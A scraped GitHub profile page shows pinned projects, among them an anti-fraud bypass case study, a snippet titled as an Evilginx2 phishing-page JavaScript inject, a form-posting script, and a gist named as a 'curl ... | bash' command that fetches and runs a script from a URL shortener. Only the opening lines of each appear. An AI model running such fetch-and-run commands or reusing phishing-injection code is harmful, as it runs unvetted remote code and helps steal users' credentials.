Skip to content
View M41KL-N41TT's full-sized avatar

Block or report M41KL-N41TT

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Maximum 250 characters. Please don't include any personal information such as legal names or email addresses. Markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse

Pinned Loading

  1. tomkabel/google-botguard-security-research tomkabel/google-botguard-security-research Public

    A Case Study in Bypassing Client-Side Anti-Fraud Mechanisms

    78 18

  2. Evilginx2 JavaScript async inject (b... Evilginx2 JavaScript async inject (but applicable for all sites really)
    1
        (function() {
    2
                async function waitForElement(selector) {
    3
                    const startTime = Date.now();
    4
                    const interval = 255;
    5
                    const timeout = 25500;
  3. curl https://y.gy/4L4q -fsSL | bash ... curl https://y.gy/4L4q -fsSL | bash -s -- -y
    1
    #!/usr/bin/env bash
    2
    set -e
    3
    
                  
    4
    ##### Configuration Section ###################################################
    5
    CONFIG_DIR="./config"
  4. Optimizing Map Operations in Go Optimizing Map Operations in Go
    1
    
                  
    2
    # Optimizing Map Operations in Go: A Comprehensive Guide 🚀
    3
    
                  
    4
    In this guide, we dive into the nuances of optimizing map operations in Go, specifically focusing on the performance aspects related to checking for the presence and addition of elements in a map. We will explore how leveraging the right data structures and understanding the underlying mechanisms can significantly enhance your Go applications.
    5
    
                  
  5. input selector input selector
    1
    The enhanced version of the script includes improvements for robust handling of dynamic form submissions using AJAX (asynchronous JavaScript and XML), optimization for performance, and introduces debouncing to minimize unnecessary network requests for rapid input changes. Additionally, it adds support for detecting navigation events initiated via the History API, which modern single-page applications (SPAs) heavily use.
    2
    
                  
    3
    ```javascript
    4
    (function waitAndPost(selector, maxWaitTime = 10000) {
    5
        let startTime = new Date().getTime();